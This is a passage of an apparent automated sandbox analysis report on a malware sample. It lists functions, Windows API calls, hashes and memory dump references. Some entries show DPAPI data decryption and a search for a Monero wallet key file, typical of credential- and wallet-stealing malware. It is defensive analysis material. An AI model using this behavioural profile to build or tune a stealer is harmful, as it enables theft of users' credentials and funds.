                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: BinaryCryptString
                                    • String ID:
                                    • API String ID: 80407269-0
                                    • Opcode ID: a0b94971feff8753a1a9f7cbf0cf0df4eb76ec9417987068cbce27eced6dfea5
                                    • Instruction ID: 4ee1434e2efcf8b5af0557d0d086c17b5edbafe451805e6c784c669571a38f7c
                                    • Opcode Fuzzy Hash: a0b94971feff8753a1a9f7cbf0cf0df4eb76ec9417987068cbce27eced6dfea5
                                    • Instruction Fuzzy Hash: 67111870200208BFDB00CF65DC89FAB33A9AF89305F109848FD1A9B250DB35EC49DBA0
                                    Function 00949AC0 Relevance: 6.1, APIs: 4, Instructions: 55encryptionmemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00944EEE,00000000,00000000), ref: 00949AEF
                                    • LocalAlloc.KERNEL32(00000040,?,?,?,00944EEE,00000000,?), ref: 00949B01
                                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00944EEE,00000000,00000000), ref: 00949B2A
                                    • LocalFree.KERNEL32(?,?,?,?,00944EEE,00000000,?), ref: 00949B3F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: BinaryCryptLocalString$AllocFree
                                    • String ID:
                                    • API String ID: 4291131564-0
                                    • Opcode ID: d5cbe5be3fab7a918a2dc6d187c57bfbf128afbd556cce2309a4c69d3f0d4662
                                    • Instruction ID: b9453c2647954fbce20a8c2cc65fc1dc0ada1a6dc9274b5d8bbf6f7a9efd3460
                                    • Opcode Fuzzy Hash: d5cbe5be3fab7a918a2dc6d187c57bfbf128afbd556cce2309a4c69d3f0d4662
                                    • Instruction Fuzzy Hash: 9011A4B4240208AFEB10CF64DC95FAA77B9FB89700F208059FA159B390C775A901CB50
                                    Function 00957980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00960E00,00000000,?), ref: 009579B0
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 009579B7
                                    • GetLocalTime.KERNEL32(?,?,?,?,?,00960E00,00000000,?), ref: 009579C4
                                    • wsprintfA.USER32 ref: 009579F3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateLocalProcessTimewsprintf
                                    • String ID:
                                    • API String ID: 377395780-0
                                    • Opcode ID: b9ace93f22aff42e673c6abd384b8c7cf258889a669744bd005968ee59a5c96d
                                    • Instruction ID: 78ff71662b1b06ea3a5d325b6a625ae72eab64294fb29a62f8f56d852a748714
                                    • Opcode Fuzzy Hash: b9ace93f22aff42e673c6abd384b8c7cf258889a669744bd005968ee59a5c96d
                                    • Instruction Fuzzy Hash: 19113CB2904118ABDB14DFCADD45BBEB7F8FB4CB11F10411AF605A2290E7395940C7B1
                                    Function 00957A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,015EDCB8,00000000,?,00960E10,00000000,?,00000000,00000000), ref: 00957A63
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00957A6A
                                    • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,015EDCB8,00000000,?,00960E10,00000000,?,00000000,00000000,?), ref: 00957A7D
                                    • wsprintfA.USER32 ref: 00957AB7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                    • String ID:
                                    • API String ID: 3317088062-0
                                    • Opcode ID: d9d267497c000fd3f4674f37da1443ec5edcc977a8026f5911e336e93e4035c0
                                    • Instruction ID: 1a05b244546dc579d3a6e3767a7e0136c27f455db8a803cfbb6ff7fbb60eb55f
                                    • Opcode Fuzzy Hash: d9d267497c000fd3f4674f37da1443ec5edcc977a8026f5911e336e93e4035c0
                                    • Instruction Fuzzy Hash: 2511E1B0905218EBEB20CF94DC49FAAB778FB40721F00039AEA0A932D0DB341E44CF51
                                    Function 00D0D5C0 Relevance: 5.3, Strings: 3, Instructions: 1536COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: JH$*hW;$7w]3
                                    • API String ID: 0-176607913
                                    • Opcode ID: 10bc786d55ed5637bad18d3eda4a9e092206aeb4dbbbc5c0fe7807fed0715fb4
                                    • Instruction ID: 1b66232034282082d49935f9f4f234d81eae88c075694ac92909b60b27ed1b64
                                    • Opcode Fuzzy Hash: 10bc786d55ed5637bad18d3eda4a9e092206aeb4dbbbc5c0fe7807fed0715fb4
                                    • Instruction Fuzzy Hash: D5A22AF3A0C6049FE304AE29EC8577AFBE5EFD4320F1A853DEAC497344E63558058696
                                    Function 00D035E1 Relevance: 5.2, Strings: 3, Instructions: 1500COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: J[w$cs]$ ?[
                                    • API String ID: 0-4010556661
                                    • Opcode ID: c1e8289ba810b1b6a6e826c70a4aa9cc036e0bef8046eb45e889a6c3cb28ab8d
                                    • Instruction ID: bf9a196884d2bad75baf3d2fe28e4c7a3eef1bec60d46e4ee096df9472fcd95c
                                    • Opcode Fuzzy Hash: c1e8289ba810b1b6a6e826c70a4aa9cc036e0bef8046eb45e889a6c3cb28ab8d
                                    • Instruction Fuzzy Hash: 67A207F360C6049FE704AE2DEC8577ABBE9EFD4620F1A863DE6C4C3744E93558058692
                                    Function 00953720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CoCreateInstance.COMBASE(0095E118,00000000,00000001,0095E108,00000000), ref: 00953758
                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 009537B0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ByteCharCreateInstanceMultiWide
                                    • String ID:
                                    • API String ID: 123533781-0
                                    • Opcode ID: 6aa6d7125a2d1b500ea0ab0e61d7228aef61b087b7bff26f555a74f984009ce3
                                    • Instruction ID: e0d2948af3d835dc7238082524dae6077e2a126cbeb0f36540421d8fd47b616c
                                    • Opcode Fuzzy Hash: 6aa6d7125a2d1b500ea0ab0e61d7228aef61b087b7bff26f555a74f984009ce3
                                    • Instruction Fuzzy Hash: C641E775A40A289FDB24DF58CC95B9BB7B5BB48702F4081D8E608E72D0E771AE85CF50
                                    Function 00949B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00949B84
                                    • LocalAlloc.KERNEL32(00000040,00000000), ref: 00949BA3
                                    • LocalFree.KERNEL32(?), ref: 00949BD3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Local$AllocCryptDataFreeUnprotect
                                    • String ID:
                                    • API String ID: 2068576380-0
                                    • Opcode ID: b3d3aef924c6331d24cbcdaa298a5c8bc0b5a0bc130bcfd8105977d436368400
                                    • Instruction ID: d14e37d093e68dcd233669bfe53d5cd36addb9fd8137160e10f13a65d50e0fed
                                    • Opcode Fuzzy Hash: b3d3aef924c6331d24cbcdaa298a5c8bc0b5a0bc130bcfd8105977d436368400
                                    • Instruction Fuzzy Hash: 5911C9B8A00209EFDB04DF94D995EAEB7B9FF88300F104599E915A7350D774AE10CFA1
                                    Function 00CFE3AB Relevance: 4.1, Strings: 2, Instructions: 1636COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: Qbbs$Z{&u
                                    • API String ID: 0-2878677978
                                    • Opcode ID: 0c27586bfe820af8dcebb8d5b746eb27e20b1a337950039159802d5766a2e606
                                    • Instruction ID: b45a242bbf6c87b7dd5df44529de8291e6a6dad0e26b2152935228ed903095f3
                                    • Opcode Fuzzy Hash: 0c27586bfe820af8dcebb8d5b746eb27e20b1a337950039159802d5766a2e606
                                    • Instruction Fuzzy Hash: 43B208F3A0C2049FE304AE2DDC8567ABBE5EF98720F1A493DEAC4C7744E63558058697
                                    Function 00CFFEB7 Relevance: 2.8, Strings: 1, Instructions: 1582COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: kgw
                                    • API String ID: 0-2332048456
                                    • Opcode ID: ab23652972c7f647a7804a0c85f12939ef26284cbf01b651d0d5aa7876ed75c0
                                    • Instruction ID: 3f84ee9051242e27db6423229b815e4a9140e647566f59fdabc625f7d66ca41f
                                    • Opcode Fuzzy Hash: ab23652972c7f647a7804a0c85f12939ef26284cbf01b651d0d5aa7876ed75c0
                                    • Instruction Fuzzy Hash: 4EB2F5B350C214AFE3046E6DEC8567ABBE9EF98320F1A493DEAC4C3744E63558448797
                                    Function 0094F68A Relevance: 1.6, APIs: 1, Instructions: 63fileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0095A740: lstrcpy.KERNEL32(00960E17,00000000), ref: 0095A788
                                      • Part of subcall function 0095A920: lstrcpy.KERNEL32(00000000,?), ref: 0095A972
                                      • Part of subcall function 0095A920: lstrcat.KERNEL32(00000000), ref: 0095A982
                                      • Part of subcall function 0095A9B0: lstrlen.KERNEL32(?,015E8AB0,?,\Monero\wallet.keys,00960E17), ref: 0095A9C5
                                      • Part of subcall function 0095A9B0: lstrcpy.KERNEL32(00000000), ref: 0095AA04
                                      • Part of subcall function 0095A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0095AA12
                                      • Part of subcall function 0095A8A0: lstrcpy.KERNEL32(?,00960E17), ref: 0095A905
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,009615B8,00960D96), ref: 0094F71E
                                    • StrCmpCA.SHLWAPI(?,009615BC), ref: 0094F76F
                                    • StrCmpCA.SHLWAPI(?,009615C0), ref: 0094F785
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0094FAB1
                                    • FindClose.KERNEL32(000000FF), ref: 0094FAC3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                    • String ID:
                                    • API String ID: 3334442632-0
